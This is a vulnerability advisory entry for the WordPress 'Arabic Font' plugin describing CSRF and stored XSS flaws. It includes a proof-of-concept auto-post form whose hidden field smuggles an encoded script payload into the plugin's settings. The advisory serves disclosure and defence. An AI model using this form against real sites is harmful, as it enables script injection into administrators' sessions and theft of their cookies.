Arabic Font - CSRF & Stored XSS



Description
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>

Affects Plugin

References

URL https://rastating.github.io/arabic-font-1-2-csrf-stored-xss

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter rastating
Submitter Website https://www.rastating.com/
Submitter Twitter @iamrastating
Views 4196
Verified No
WPVDB ID 8868

Timeline

Publicly Published 2017-07-20 (about 2 years ago)
Added 2017-07-21 (about 2 years ago)
Last Updated 2019-02-18 (6 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin